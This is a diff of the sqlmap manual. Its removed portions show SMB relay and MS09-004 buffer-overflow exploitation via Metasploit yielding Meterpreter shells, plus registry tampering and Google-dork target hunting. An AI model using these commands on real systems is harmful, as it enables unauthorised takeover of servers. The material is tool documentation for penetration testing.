-[hh:mm:52] [INFO] cleaning up the database management system
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-os-smbrelay</CODE>, <CODE>-</CODE><CODE>-priv-esc</CODE> and <CODE>-</CODE><CODE>-msf-path</CODE></P>
-
-<P>If the back-end database management system runs on Windows as
-<CODE>Administrator</CODE> and the system is not patched against Microsoft
-Security Bulletin 
-<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx">MS08-068</A>, sqlmap can abuse the universal naming convention (UNC)
-feature within any database management system to force the database server
-to initiate a SMB connection with the attacker host, then perform a SMB
-authentication relay attack in order to establish a high-privileged
-<B>out-of-band TCP stateful channel</B> between the attacker host and
-the target database server.
-sqlmap relies on 
-<A HREF="http://metasploit.com/framework">Metasploit</A>'s SMB relay exploit to perform this attack.
-You need to run sqlmap as a privileged user (e.g. <B>root</B>) if you
-want to perform a SMB relay attack because it will need to listen on a
-user-specified SMB TCP port for incoming connection attempts.</P>
-
-<P>Note that this feature is not supported by sqlmap running on Windows
-platform because it relies on Metasploit's <CODE>msfpayload</CODE> which is
-not fully working on Windows.</P>
-
-<P>This technique is detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> running as
-<CODE>Administrator</CODE> on the target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ sudo python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
-
-[...]
-[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:11] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often 
-Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not 
-send the NTLM session hash when connecting to a SMB service
-[hh:mm:16] [INFO] which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
-> 1
-[hh:mm:16] [INFO] which is the local address? [172.16.213.161] 172.16.213.161
-[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
-[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
-[hh:mm:16] [INFO] which payload do you want to use?
-[1] Meterpreter (default)
-[2] Shell
-[3] VNC
-> 1
-[hh:mm:16] [INFO] which SMB port do you want to use?
-[1] 139/TCP (default)
-[2] 445/TCP
-> 1
-[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait..
-
-                _                  _       _ _
-               | |                | |     (_) |
- _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
-| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
-| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
-|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
-                            | |
-                            |_|
-
-
-       =[ msf v3.3-dev
-+ -- --=[ 392 exploits - 234 payloads
-+ -- --=[ 20 encoders - 7 nops
-       =[ 168 aux
-
-resource> use windows/smb/smb_relay
-resource> set SRVHOST 172.16.213.161
-SRVHOST => 172.16.213.161
-resource> set SRVPORT 139
-SRVPORT => 139
-resource> set PAYLOAD windows/meterpreter/bind_tcp
-PAYLOAD => windows/meterpreter/bind_tcp
-resource> set LPORT 4907
-LPORT => 4907
-resource> set RHOST 172.16.213.131
-RHOST => 172.16.213.131
-resource> exploit
-[*] Exploit running as background job.
-msf exploit(smb_relay) > 
-[*] Started bind handler
-[*] Server started.
-[*] Received 172.16.213.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
-Service Pack 2 LM:
-[*] Sending Access Denied to 172.16.213.131:3242 \
-[*] Received 172.16.213.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
-Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
-[*] AUTHENTICATED as W2K3DEV\Administrator...
-[*] Connecting to the ADMIN$ share...
-[*] Regenerating the payload...
-[*] Uploading payload...
-[*] Created \wELRmcmd.exe...
-[*] Connecting to the Service Control Manager...
-[*] Obtaining a service manager handle...
-[*] Creating a new service...
-[*] Closing service handle...
-[*] Opening service...
-[*] Starting the service...
-[*] Removing the service...
-[*] Closing service handle...
-[*] Deleting \wELRmcmd.exe...
-[*] Sending Access Denied to 172.16.213.131:3242 W2K3DEV\Administrator
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Received 172.16.213.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
-Service Pack 2 LM:
-[*] Sending Access Denied to 172.16.213.131:3244 \
-[*] Received 172.16.213.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
-Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
-[*] AUTHENTICATED as W2K3DEV\Administrator...
-[*] Ignoring request from 172.16.213.131, attack already in progress.
-[*] Sending Access Denied to 172.16.213.131:3244 W2K3DEV\Administrator
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (172.16.213.161:51813 -> 172.16.213.131:4907)
-
-Active sessions
-===============
-
-  Id  Description  Tunnel                                       
-  --  -----------  ------                                       
-  1   Meterpreter  172.16.213.161:51813 -> 172.16.213.131:4907  
-
-msf exploit(smb_relay) > [*] Starting interaction with 1...
-
-meterpreter > [-] The 'priv' extension has already been loaded.
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > exit
-
-[*] Meterpreter session 1 closed.
-msf exploit(smb_relay) > exit
-
-[*] Server stopped.
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H3>Database stored procedure heap-based buffer overflow exploit</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-os-bof</CODE>, <CODE>-</CODE><CODE>-priv-esc</CODE> and <CODE>-</CODE><CODE>-msf-path</CODE></P>
-
-<P>If the back-end database management system is Microsoft SQL Server not
-patched against Microsoft Security Bulletin
-<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS09-004.mspx">MS09-004</A>, sqlmap can exploit the heap-based buffer overflow
-affecting <CODE>sp_replwritetovarbin</CODE> stored procedure in order to
-establish an <B>out-of-band TCP stateful channel</B> between the
-attacker host and the target database server.
-sqlmap has its own exploit to trigger the vulnerability, but it relies on
-<A HREF="http://metasploit.com/framework">Metasploit</A> to
-generate the shellcode used within the exploit.</P>
-
-<P>Note that this feature is not supported by sqlmap running on Windows
-platform because it relies on Metasploit's <CODE>msfcli</CODE> which is not
-available for Windows.</P>
-
-<P>This technique is detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> and in the
-slide deck 
-<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">Expanding the control over the operating system from the database</A>.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1 \
-  --os-bof -v 1 --msf-path ~/software/metasploit
-
-[...]
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:51] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
-stored procedure heap-based buffer overflow (MS09-004)
-[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack
-[hh:mm:56] [INFO] retrieved: 1
-[hh:mm:58] [INFO] retrieved: 1
-[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
-[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
-which connection type do you want to use?
-[1] Reverse TCP: Connect back from the database host to this machine (default)
-[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
-between the specified and 65535
-[3] Bind TCP: Listen on the database host for a connection
-> 
-which is the local address? [172.16.213.1] 
-which local port number do you want to use? [21380] 
-which payload do you want to use?
-[1] Meterpreter (default)
-[2] Shell
-[3] VNC
-> 
-which payload encoding do you want to use?
-[1] No Encoder
-[2] Alpha2 Alphanumeric Mixedcase Encoder
-[3] Alpha2 Alphanumeric Uppercase Encoder
-[4] Avoid UTF8/tolower
-[5] Call+4 Dword XOR Encoder
-[6] Single-byte XOR Countdown Encoder
-[7] Variable-length Fnstenv/mov Dword XOR Encoder
-[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
-[9] Non-Alpha Encoder
-[10] Non-Upper Encoder
-[11] Polymorphic XOR Additive Feedback Encoder (default)
-[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
-[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
-> 
-[hh:mm:16] [INFO] creation in progress .... done
-[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[*] Please wait while we load the module tree...
-[*] Started reverse handler on 172.16.213.1:21380 
-[*] Starting the payload handler...
-[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait..
-[*] Sending stage (748032 bytes)
-[*] Meterpreter session 1 opened (172.16.213.1:21380 -> 172.16.213.128:12062)
-
-meterpreter > Loading extension espia...success.
-meterpreter > Loading extension incognito...success.
-meterpreter > Loading extension priv...success.
-meterpreter > Loading extension sniffer...success.
-meterpreter > Computer: W2K3DEV
-OS      : Windows .NET Server (Build 3790, Service Pack 2).
-Arch    : x86
-Language: en_US
-meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
-meterpreter > ipconfig
-
-MS TCP Loopback interface
-Hardware MAC: 00:00:00:00:00:00
-IP Address  : 127.0.0.1
-Netmask     : 255.0.0.0
-
-
-
-VMware Accelerated AMD PCNet Adapter #2
-Hardware MAC: 00:0c:29:86:69:1b
-IP Address  : 172.16.213.128
-Netmask     : 255.255.255.0
-
-
-meterpreter > exit
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A>
+<H2><A NAME="ss5.14">5.14</A> <A HREF="#toc5.14">Windows registry access</A>
 </H2>
 
-<P>It is possible to access Windows registry when the back-end 
-database management system is either MySQL, PostgreSQL or 
-Microsoft SQL Server, and when the underlying database layer 
-supports stacked SQL queries. Also, session user has to have
-the needed privileges to access it.</P>
+<P>It is possible to access Windows registry when the back-end database
+management system is either MySQL, PostgreSQL or Microsoft SQL Server,
+and when the web application supports stacked queries. Also, session user
+has to have the needed privileges to access it.</P>
 
 <H3>Read a Windows registry key value</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-reg-read</CODE></P>
 
 <P>Using this option you can read registry key values.</P>
 
-<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
-
-[...]
-web server operating system: Windows
-web application technology: PHP 5.3.1, Apache 2.2.14
-back-end DBMS: PostgreSQL
-
-[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:15] [INFO] retrieved: 8.4.2,
-[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:23] [INFO] testing if current user is DBA
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
-[hh:mm:23] [INFO] retrieved: 0
-[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:24] [INFO] retrieved: 0
-[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
-[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
-which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
-CurrentVersion]
-which registry key value do you want to read? [ProductName]
-[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
-Windows NT\CurrentVersion\ProductName'
-[hh:mm:35] [INFO] retrieved: ProductName        REG_SZ  Microsoft Windows XP
-Registry key value data:    'ProductName        REG_SZ  Microsoft Windows XP'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <H3>Write a Windows registry key value</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-reg-add</CODE></P>
 
 <P>Using this option you can write registry key values.</P>
 
-<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
-
-[...]
-web server operating system: Windows
-web application technology: PHP 5.3.1, Apache 2.2.14
-back-end DBMS: PostgreSQL
-
-[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:20] [INFO] retrieved: 8.4.2,
-[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:29] [INFO] retrieved: 1
-[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:30] [INFO] testing if current user is DBA
-[hh:mm:30] [INFO] retrieved: 1
-[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:30] [INFO] retrieved: 0
-[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
-which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
-which registry key value do you want to write? Test
-which registry key value data do you want to write? 1
-which registry key value data-type is it? [REG_SZ] REG_DWORD
-[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
-with data '1'. This will work only if the user running the database process has privileges
-to modify the Windows registry.
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <H3>Delete a Windows registry key</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-reg-del</CODE></P>
 
 <P>Using this option you can delete registry keys.</P>
 
-<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
-
-[...]
-web server operating system: Windows
-web application technology: PHP 5.3.1, Apache 2.2.14
-back-end DBMS: PostgreSQL
-
-[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:20] [INFO] retrieved: 8.4.2,
-[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:29] [INFO] retrieved: 1
-[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:30] [INFO] testing if current user is DBA
-[hh:mm:30] [INFO] retrieved: 1
-[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:30] [INFO] retrieved: 0
-[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
-which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
-which registry key value do you want to delete? Test
-are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
-sqlmap\Test? [y/N] y
-[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'. 
-This will work only if the user running the database process has privileges to modify the 
-Windows registry.
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
 <H3>Auxiliary registry switches</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>, 
+<P>Switches: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>,
 <CODE>-</CODE><CODE>-reg-data</CODE> and <CODE>-</CODE><CODE>-reg-type</CODE></P>
 
 <P>These switches can be used to provide data needed for proper running of
@@ -5706,82 +2535,48 @@ options <CODE>-</CODE><CODE>-reg-read</CODE>, <CODE>-</CODE><CODE>-reg-add</CODE
 information when asked, you can use them at command prompt as program
 arguments.</P>
 
-<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used windows 
-registry key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item
-name inside provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value 
-data, while with <CODE>-</CODE><CODE>-reg-type</CODE> option you specify
-type of the value item.</P>
+<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used Windows registry
+key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item name inside
+provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value data, while with
+<CODE>-</CODE><CODE>-reg-type</CODE> option you specify type of the value item.</P>
 
-<P>So, another way of running example from option 
-<CODE>-</CODE><CODE>-reg-add</CODE> could be:</P>
+<P>A sample command line for adding a registry key hive follows:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \ 
-  --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
+$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \ 
+  --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
-<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A>
+
+<H2><A NAME="ss5.15">5.15</A> <A HREF="#toc5.15">General</A>
 </H2>
 
-<H3>Session file: save and resume all data retrieved</H3>
+<H3>TODO</H3>
 
-<P>Option: <CODE>-s</CODE></P>
+<P>Switch: <CODE>-t</CODE></P>
 
-<P>By default sqlmap logs all queries and their output into a text file while
-performing whatever request, both in blind SQL injection and in inband SQL
-injection.
-This is useful if you stop the injection and resume it after some time.</P>
+<P>TODO</P>
 
-<P>The default session file is <CODE>output/hostname/session</CODE>, but you can
-change its path with the <CODE>-s</CODE> option.</P>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 2 -s "sqlmap.log"
+<H3>Session file: save and resume data retrieved</H3>
 
-[...]
-back-end DBMS:  PostgreSQL
-[hh:mm:02] [DEBUG] query: VERSION()
-[hh:mm:02] [INFO] retrieved: PostgreSQL 8.3.5 on i486-pc-^C
-[hh:mm:03] [ERROR] user aborted
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>Switch: <CODE>-s</CODE></P>
 
-<P>As you can see, I stopped the injection with <CODE>CTRL-C</CODE> while
-retrieving the PostgreSQL banner and logged the session to text file
-<CODE>sqlmap.log</CODE>.</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ cat sqlmap.log
+<P>By default sqlmap logs all queries and their output into a textual file
+called <EM>session file</EM>, regardless of the technique used to extract
+the data.
+This is useful if you stop the injection for any reason and rerun it
+afterwards: sqlmap will parse the session file and resume enumerated data
+from it, then carry on extracting data from the exact point where it left
+before you stopped the tool.</P>
 
-[hh:mm:00 MM/DD/YY]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL]
-[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 
-on i486-pc-
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>The default session file is <CODE>output/TARGET_URL/session</CODE>, but you
+can specify a different file path with <CODE>-s</CODE> switch.</P>
 
-<P>As you can see, all queries performed and their output have been logged to
-the session file in real time while performing the injection.</P>
-
-<P>The session file has a structure as follows:</P>
+<P>The session file has the following structure:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
@@ -5791,445 +2586,171 @@ the session file in real time while performing the injection.</P>
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>Performing the same request now, sqlmap resumes all information already
-retrieved then calculates the query length, in the example
-<CODE>VERSION()</CODE>, and resumes the injection from the last character
-retrieved to the end of the query output.</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 2 -s "sqlmap.log"
-
-[...]
-[hh:mm:03] [INFO] resuming injection point 'GET' from session file
-[hh:mm:03] [INFO] resuming injection parameter 'id' from session file
-[hh:mm:03] [INFO] resuming injection type 'numeric' from session file
-[hh:mm:03] [INFO] resuming 0 number of parenthesis from session file
-[hh:mm:03] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
-[hh:mm:03] [INFO] testing connection to the target url
-[hh:mm:03] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:03] [INFO] retrieving the length of query output
-[hh:mm:03] [DEBUG] query: LENGTH(VERSION())
-[hh:mm:03] [INFO] retrieved: 98
-[hh:mm:03] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.3.5 on i486-pc-...
-[hh:mm:03] [INFO] retrieving pending 70 query output characters
-[hh:mm:03] [DEBUG] query: SUBSTR((VERSION())::text, 29, 98)
-[hh:mm:03] [INFO] retrieved: linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-back-end DBMS: PostgreSQL
-
-[hh:mm:07] [INFO] fetching banner
-banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>A more user friendly textual file where all data retrieved is saved, is
+the <EM>log file</EM>, <CODE>output/TARGET_URL/log</CODE>. This file can be
+useful to see all information enumerated to the end.</P>
 
 
-<H3>Flush session file for current target</H3>
+<H3>Flush session file</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-flush-session</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-flush-session</CODE></P>
 
 <P>As you are already familiar with the concept of a session file from the
-description of option <CODE>-s</CODE>, it is good to know that you can flush
-the content of that same file using option <CODE>-</CODE><CODE>-flush-session</CODE>.
-This way you can avoid caching mechanisms implemented by default in
-sqlmap. Other possible way is the manual removing of session file(s),
-<CODE>sqlmap.log</CODE> in the example above, or the default
-<CODE>output/hostname/session</CODE> if <CODE>-s</CODE> is not provided.</P>
+description above, it is good to know that you can flush the content of
+that file using option <CODE>-</CODE><CODE>-flush-session</CODE>.
+This way you can avoid the caching mechanisms implemented by default in
+sqlmap. Other possible way is to manually remove the session file(s).</P>
 
 
 <H3>Estimated time of arrival</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-eta</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-eta</CODE></P>
 
-<P>It is possible to calculate and show the estimated time of arrival to
-retrieve each query output in real time while performing the SQL injection
-attack.</P>
+<P>It is possible to calculate and show in real time the estimated time of
+arrival to retrieve each query output. This is shown when the technique
+used to retrieve the output is any of the blind SQL injection types.</P>
 
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
+<P>Example against an Oracle target affected only by boolean-based blind SQL
+injection:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -b \
-  --eta -v 2
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
 
 [...]
-back-end DBMS:  Oracle
-
-[hh:mm:24] [INFO] fetching banner
-[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query 
-output again
-[hh:mm:24] [INFO] retrieved the length of query output: 64
-[hh:mm:24] [DEBUG] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version 
-WHERE ROWNUM=1
-77% [=======================================>            ] 49/64  ETA 00:00    
+[hh:mm:01] [INFO] the back-end DBMS is Oracle
+[hh:mm:01] [INFO] fetching banner
+[hh:mm:01] [INFO] retrieving the length of query output
+[hh:mm:01] [INFO] retrieved: 64
+17% [========>                                          ] 11/64  ETA 00:19
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>then:</P>
+<P>Then:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-100% [====================================================] 64/64              
-[hh:mm:15] [DEBUG] performed 454 queries in 2 seconds
-banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+100% [===================================================] 64/64               
+[10:28:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" \
-  --users --eta -v 1
-
-[...]
-back-end DBMS:  Microsoft SQL Server 2000
-
-[hh:mm:57] [INFO] fetching database users
-[hh:mm:57] [INFO] fetching number of database users
-[hh:mm:57] [INFO] retrieved: 3
-[hh:mm:57] [INFO] retrieved the length of query output: 22
-100% [====================================================] 22/22
-[hh:mm:58] [INFO] retrieved the length of query output: 2
-100% [====================================================] 2/2
-[hh:mm:59] [INFO] retrieved the length of query output: 25
-100% [====================================================] 25/25
-[hh:mm:00] [DEBUG] performed 181 queries in 1 seconds
-database management system users [3]:
-[*] BUILTIN\Administrators
-[*] sa
-[*] W2KITINQUIS\Administrator
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: Oracle
+banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
 <P>As you can see, sqlmap first calculates the length of the query output,
 then estimates the time of arrival, shows the progress in percentage and
-counts the number of retrieved query output characters.</P>
-
-
-<H3>Use Google dork results from specified page number</H3>
-
-<P>Option: <CODE>-</CODE><CODE>-gpage</CODE></P>
-
-<P>Default sqlmap behavior with option <CODE>-g</CODE> is to do a Google
-search and use resulting urls from first (100) result page for further 
-sql injection testing. In combination with this option you can specify
-some other page other than the first one for retrieving target urls.</P>
-
-<P>Example of Google dorking with expression <CODE>login ext:php</CODE> 
-and resulting page set to 3:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -g "ext:php login" --gpage 3 -v 1
-
-[hh:mm:14] [INFO] first request to Google to get the session cookie
-[hh:mm:14] [INFO] using Google result page #3
-[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are 
-testable targets
-[hh:mm:15] [INFO] sqlmap got a total of 89 targets
-url 1:
-GET http://www.XXX.com/index.php?pageid=login
-do you want to test this url? [Y/n/q]
-> y
-[hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login
-[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file
-[hh:mm:17] [INFO] testing connection to the target url
-[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:19] [INFO] url is stable
-[hh:mm:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
